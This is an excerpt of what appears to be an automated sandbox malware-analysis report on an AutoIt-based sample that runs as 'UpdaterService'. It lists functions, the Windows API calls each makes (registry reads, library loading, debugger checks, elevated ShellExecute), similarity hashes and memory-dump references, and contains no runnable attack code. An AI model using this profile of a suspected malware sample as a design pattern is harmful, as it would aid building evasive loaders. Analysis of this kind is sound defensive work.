Instruction Fuzzy Hash: 7131FA326002197FDB20EFB0DC68ADE776CDF15324F1006EAE814A2190F771AA458A69

Function 04649C97 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 04649CBB

Part of subcall function 0464A3A2: __fltout2.LIBCMT ref: 0464A3CB

__cftog_l.LIBCMT ref: 04649CE1
__cftoe_l.LIBCMT ref: 04649D13

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: a381e33ba48967da5d3c748b042c8afec7a179c3259297b3f2db85df70a56e69
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: CE015EB208014EBBCF165ED4CC41CEE3F62BFA9354B588416FA1959130E337E5B6AB81

Function 04649C97 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 04649CBB

Part of subcall function 0464A3A2: __fltout2.LIBCMT ref: 0464A3CB

__cftog_l.LIBCMT ref: 04649CE1
__cftoe_l.LIBCMT ref: 04649D13

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 045F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: a381e33ba48967da5d3c748b042c8afec7a179c3259297b3f2db85df70a56e69
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: CE015EB208014EBBCF165ED4CC41CEE3F62BFA9354B588416FA1959130E337E5B6AB81

Function 0466B9DE Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 224COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0466BA21

Strings

, xrefs: 0466BA30

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-3916222277
Opcode ID: 43acfaaacaa03db3299e4db08de07f731a7862975729fd7702a089c4c0a0429f
Instruction ID: d5e133d28ac0e1e6f34f0733cdf5927abe50c793bc6f07f52a6ae8be142742c4
Opcode Fuzzy Hash: 43acfaaacaa03db3299e4db08de07f731a7862975729fd7702a089c4c0a0429f
Instruction Fuzzy Hash: BA8181B1900259FFDF11DFA4CD45AEE7B78EF14704F04416AF922E6260EB32AA14DB64

Function 0466B9DE Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 224COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0466BA21

Strings

, xrefs: 0466BA30

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 045F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-3916222277
Opcode ID: 43acfaaacaa03db3299e4db08de07f731a7862975729fd7702a089c4c0a0429f
Instruction ID: d5e133d28ac0e1e6f34f0733cdf5927abe50c793bc6f07f52a6ae8be142742c4
Opcode Fuzzy Hash: 43acfaaacaa03db3299e4db08de07f731a7862975729fd7702a089c4c0a0429f
Instruction Fuzzy Hash: BA8181B1900259FFDF11DFA4CD45AEE7B78EF14704F04416AF922E6260EB32AA14DB64

Function 04625A75 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201COMMON

Download Yara Rule

APIs

_wcscat.LIBCMT ref: 04662D42

Strings

\, xrefs: 04662D65

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: _wcscat
String ID: \
API String ID: 2563891980-2967466578
Opcode ID: 98b5b856b38fd4653d5d51d41a14d1ec0b159b574769ee2cf3012f3e86e72e17
Instruction ID: 6629fe83f0d5f895dcd6562f5ef788f15da18c23e16e6ba1cf7149661a76f849
Opcode Fuzzy Hash: 98b5b856b38fd4653d5d51d41a14d1ec0b159b574769ee2cf3012f3e86e72e17
Instruction Fuzzy Hash: B3718A71504B11AED340EF65E994DABBBE8FF94304F40497EE446972A0EF30A548CB5A

Function 04625A75 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201COMMON

Download Yara Rule

APIs

_wcscat.LIBCMT ref: 04662D42

Strings

\, xrefs: 04662D65

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 045F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: _wcscat
String ID: \
API String ID: 2563891980-2967466578
Opcode ID: 98b5b856b38fd4653d5d51d41a14d1ec0b159b574769ee2cf3012f3e86e72e17
Instruction ID: 6629fe83f0d5f895dcd6562f5ef788f15da18c23e16e6ba1cf7149661a76f849
Opcode Fuzzy Hash: 98b5b856b38fd4653d5d51d41a14d1ec0b159b574769ee2cf3012f3e86e72e17
Instruction Fuzzy Hash: B3718A71504B11AED340EF65E994DABBBE8FF94304F40497EE446972A0EF30A548CB5A

Function 046925B7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 046925E1
_memset.LIBCMT ref: 046926AA

Part of subcall function 04626E1A: _wcscpy.LIBCMT ref: 04626E3D

Strings

@, xrefs: 046926BE

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: _memset$_wcscpy
String ID: @
API String ID: 996981245-2766056989
Opcode ID: 5848c59b5e4ceb8dbfc7f339962e0de36151acc6508846811d051c8158f77560
Instruction ID: cdc9d4fa4495c257bfcebd5ecee68e49b86c7b88e2c4296b0aad366b93ff2126
Opcode Fuzzy Hash: 5848c59b5e4ceb8dbfc7f339962e0de36151acc6508846811d051c8158f77560
Instruction Fuzzy Hash: 32618B75A00619AFDB14EF64C8909AEBBF5FF48314F1484ADD816AB360EB30BD41CB94

Function 046925B7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 046925E1
_memset.LIBCMT ref: 046926AA

Part of subcall function 04626E1A: _wcscpy.LIBCMT ref: 04626E3D

Strings

@, xrefs: 046926BE

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 045F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: _memset$_wcscpy
String ID: @
API String ID: 996981245-2766056989
Opcode ID: 5848c59b5e4ceb8dbfc7f339962e0de36151acc6508846811d051c8158f77560
Instruction ID: cdc9d4fa4495c257bfcebd5ecee68e49b86c7b88e2c4296b0aad366b93ff2126
Opcode Fuzzy Hash: 5848c59b5e4ceb8dbfc7f339962e0de36151acc6508846811d051c8158f77560
Instruction Fuzzy Hash: 32618B75A00619AFDB14EF64C8909AEBBF5FF48314F1484ADD816AB360EB30BD41CB94

Function 04675461 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 046754AF

Strings

0, xrefs: 046754A8
2, xrefs: 04675534

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: _memset
String ID: 0$2
API String ID: 2102423945-3793063076
Opcode ID: 0aa36013b0828378258fbe19907d7e7261963f9ab17cf3c8f08e2b12e3cf420c
Instruction ID: c763a428c3332832981db1399c5041e1f125f2cdd6ae7a5d6299f257baf301f0
Opcode Fuzzy Hash: 0aa36013b0828378258fbe19907d7e7261963f9ab17cf3c8f08e2b12e3cf420c
Instruction Fuzzy Hash: 63518070A01349FFEF20CF68C888AADBBF6AF55314F1441A9E4169B690F770AD45CB51

Function 04675461 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 046754AF

Strings

2, xrefs: 04675534
0, xrefs: 046754A8

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 045F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: _memset
String ID: 0$2
API String ID: 2102423945-3793063076
Opcode ID: 0aa36013b0828378258fbe19907d7e7261963f9ab17cf3c8f08e2b12e3cf420c
Instruction ID: c763a428c3332832981db1399c5041e1f125f2cdd6ae7a5d6299f257baf301f0
Opcode Fuzzy Hash: 0aa36013b0828378258fbe19907d7e7261963f9ab17cf3c8f08e2b12e3cf420c
Instruction Fuzzy Hash: 63518070A01349FFEF20CF68C888AADBBF6AF55314F1441A9E4169B690F770AD45CB51

Function 0469A227 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 103COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0469A23F

Strings

F, xrefs: 0469A337
0, xrefs: 0469A235

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: _memset
String ID: 0$F
API String ID: 2102423945-3044882817
Opcode ID: 3835a7e44b937527d570b4358b05d84f911ebc4fc5feb48917e96ccc3cac0bd7
Instruction ID: c93f9dd1a8991f5cf97bcd39741a99368fc261e7f17194a6dc7ad0bb3302d1a3
Opcode Fuzzy Hash: 3835a7e44b937527d570b4358b05d84f911ebc4fc5feb48917e96ccc3cac0bd7
Instruction Fuzzy Hash: 53414674A00209EFDB10DFA4D888AAA7BF9FF59310F094029E91AD7350E771A910DF54

Function 0469A227 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 103COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0469A23F

Strings

F, xrefs: 0469A337
0, xrefs: 0469A235

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 045F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: _memset
String ID: 0$F
API String ID: 2102423945-3044882817
Opcode ID: 3835a7e44b937527d570b4358b05d84f911ebc4fc5feb48917e96ccc3cac0bd7
Instruction ID: c93f9dd1a8991f5cf97bcd39741a99368fc261e7f17194a6dc7ad0bb3302d1a3
Opcode Fuzzy Hash: 3835a7e44b937527d570b4358b05d84f911ebc4fc5feb48917e96ccc3cac0bd7
Instruction Fuzzy Hash: 53414674A00209EFDB10DFA4D888AAA7BF9FF59310F094029E91AD7350E771A910DF54

Analysis Process: Autoit3.exePID: 4416, Parent PID: 1028COMMON

Execution Graph

Execution Coverage:	3.7%
Dynamic/Decrypted Code Coverage:	21.4%
Signature Coverage:	3.4%
Total number of Nodes:	2000
Total number of Limit Nodes:	64

Executed Functions

Function 0179BF0D Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 186
registrystringlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 0179BF28
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 0179BF46
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 0179BF64
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 0179BF82
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,0179C011,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0179BFCB
RegQueryValueExA.ADVAPI32(?,0179C18D,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,0179C011,?,80000001), ref: 0179BFE9
RegCloseKey.ADVAPI32(?,0179C018,00000000,00000000,00000005,00000000,0179C011,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 0179C00B
lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 0179C028
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 0179C035
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 0179C03B
lstrlen.KERNEL32(00000000), ref: 0179C066
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 0179C0BB
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 0179C0CB
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 0179C0F7
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 0179C107
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 0179C131
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 0179C141

Strings

Software\Borland\Delphi\Locales, xrefs: 0179BF78
Software\Borland\Locales, xrefs: 0179BF3C, 0179BF5A

Memory Dump Source

Source File: 00000008.00000002.2390371860.0000000001795000.00000040.00000020.00020000.00000000.sdmp, Offset: 01795000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1795000_Autoit3.jbxd

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1759228003-2375825460
Opcode ID: 4144553e62aad03283a47cde3d4ce3cfface3710e6cbc584a566ff9ed6efec47
Instruction ID: f00cfd45dfc8366275f3dd7b6fd8c994c919d2d7b67294130407d57844f769b0
Opcode Fuzzy Hash: 4144553e62aad03283a47cde3d4ce3cfface3710e6cbc584a566ff9ed6efec47
Instruction Fuzzy Hash: F36166B1E4420E7EEF11DAE8DC49FEFF7BC9B19304F4040A1A644E6185D7B4DA488B91

Function 046F5B4C Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 186
registrystringlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 046F5B67
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 046F5B85
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 046F5BA3
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 046F5BC1
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,046F5C50,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 046F5C0A
RegQueryValueExA.ADVAPI32(?,046F5DCC,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,046F5C50,?,80000001), ref: 046F5C28
RegCloseKey.ADVAPI32(?,046F5C57,00000000,00000000,00000005,00000000,046F5C50,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 046F5C4A
lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 046F5C67
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 046F5C74
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 046F5C7A
lstrlen.KERNEL32(00000000), ref: 046F5CA5
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 046F5CFA
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 046F5D0A
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 046F5D36
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 046F5D46
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 046F5D70
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 046F5D80

Strings

Software\Borland\Delphi\Locales, xrefs: 046F5BB7
Software\Borland\Locales, xrefs: 046F5B7B, 046F5B99

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1759228003-2375825460
Opcode ID: 18645cebf65a46eeb5a7d0b5a1e6238940dba6c3f4b2b2993b0dc3ea4d0cd1be
Instruction ID: 854dd026448bb91f0f04690d759ecf4e4ab6be0710a9e167408c977909369f1e
Opcode Fuzzy Hash: 18645cebf65a46eeb5a7d0b5a1e6238940dba6c3f4b2b2993b0dc3ea4d0cd1be
Instruction Fuzzy Hash: 8F615271E4424DBEEB10DAE8CC49FEF77BC9B19704F404096A785E2182F6B4AE84CB54

Function 00C55240 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 147
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C5526C
IsDebuggerPresent.KERNEL32 ref: 00C5527E
GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00C552E6

Part of subcall function 00C51821: _memmove.LIBCMT ref: 00C5185B

Part of subcall function 00C4BBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00C4BC07

SetCurrentDirectoryW.KERNEL32(?), ref: 00C55366
MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00C90B2E
SetCurrentDirectoryW.KERNEL32(?), ref: 00C90B66
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00CF6D10), ref: 00C90BE9
ShellExecuteW.SHELL32(00000000), ref: 00C90BF0

Part of subcall function 00C5514C: GetSysColorBrush.USER32(0000000F), ref: 00C55156
Part of subcall function 00C5514C: LoadCursorW.USER32(00000000,00007F00), ref: 00C55165
Part of subcall function 00C5514C: LoadIconW.USER32(00000063), ref: 00C5517C
Part of subcall function 00C5514C: LoadIconW.USER32(000000A4), ref: 00C5518E
Part of subcall function 00C5514C: LoadIconW.USER32(000000A2), ref: 00C551A0
Part of subcall function 00C5514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C551C6
Part of subcall function 00C5514C: RegisterClassExW.USER32(?), ref: 00C5521C

Part of subcall function 00C550DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,rrrrrrrr,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C55109
Part of subcall function 00C550DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C5512A
Part of subcall function 00C550DB: ShowWindow.USER32(00000000), ref: 00C5513E
Part of subcall function 00C550DB: ShowWindow.USER32(00000000), ref: 00C55147

Part of subcall function 00C559D3: _memset.LIBCMT ref: 00C559F9
Part of subcall function 00C559D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C55A9E

Strings

It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00C90B28
runas, xrefs: 00C90BE4
AutoIt, xrefs: 00C90B23

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
API String ID: 529118366-2030392706
Opcode ID: 3d0c5bf12f9662b76b838135eaa4e26b154c45201e873984adb6677d1970b147
Instruction ID: 0d097a07635c1034d072a4d80a87dbaa878bbefd1f81176194510d68e7400d7b
Opcode Fuzzy Hash: 3d0c5bf12f9662b76b838135eaa4e26b154c45201e873984adb6677d1970b147
Instruction Fuzzy Hash: AF512735D04248AFCF01ABB4DC19FFD7B74AB05341F240065FD59A62A2CAB0668CE739

Function 0179C017 Relevance: 15.1, APIs: 10, Instructions: 102
stringlibrarythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 0179C028
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 0179C035
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 0179C03B
lstrlen.KERNEL32(00000000), ref: 0179C066
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 0179C0BB
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 0179C0CB
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 0179C0F7
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 0179C107
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 0179C131
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 0179C141

Memory Dump Source

Source File: 00000008.00000002.2390371860.0000000001795000.00000040.00000020.00020000.00000000.sdmp, Offset: 01795000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1795000_Autoit3.jbxd

Similarity

API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
String ID:
API String ID: 1599918012-0
Opcode ID: c215516fb5951c465a98e791fc99ed20a515ebe720d1e0e1ae2d7fa59520051b
Instruction ID: fe5356448fc659f6bd3b90944f83e711aef6487b9a48a284b15c5b5025ded4ea
Opcode Fuzzy Hash: c215516fb5951c465a98e791fc99ed20a515ebe720d1e0e1ae2d7fa59520051b
Instruction Fuzzy Hash: 1A3156B1E0420E7FEF16DAECDC88FEEF7BD9B59300F0441A19248E7185D6B49A498B51

Function 046F5C56 Relevance: 15.1, APIs: 10, Instructions: 102stringlibrarythreadCOMMON

Download Yara Rule

APIs

lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 046F5C67
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 046F5C74
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 046F5C7A
lstrlen.KERNEL32(00000000), ref: 046F5CA5
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 046F5CFA
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 046F5D0A
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 046F5D36
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 046F5D46
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 046F5D70
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 046F5D80

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
String ID:
API String ID: 1599918012-0
Opcode ID: 03ad8f3e17906f8cd012698ddc78971fc83c9af8fdabfec97549a1873ab5c4b8
Instruction ID: a01b865cf28eb1f76c0453e33779557bfe563f240168538ba5c2d557f41d34f9
Opcode Fuzzy Hash: 03ad8f3e17906f8cd012698ddc78971fc83c9af8fdabfec97549a1873ab5c4b8
Instruction Fuzzy Hash: 22314371E0424DBEEF11DAE8CC88FEF77BD9B59304F0441969285E2181F6B8AE858F54

Function 00C55D13 Relevance: 10.7, APIs: 7, Instructions: 223COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 00C55D40

Part of subcall function 00C51821: _memmove.LIBCMT ref: 00C5185B

GetCurrentProcess.KERNEL32(?,00CD0A18,00000000,00000000,?), ref: 00C55E07
IsWow64Process.KERNEL32(00000000), ref: 00C55E0E
GetNativeSystemInfo.KERNEL32(00000000), ref: 00C55E54
FreeLibrary.KERNEL32(00000000), ref: 00C55E5F
GetSystemInfo.KERNEL32(00000000), ref: 00C55E90
GetSystemInfo.KERNEL32(00000000), ref: 00C55E9C

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
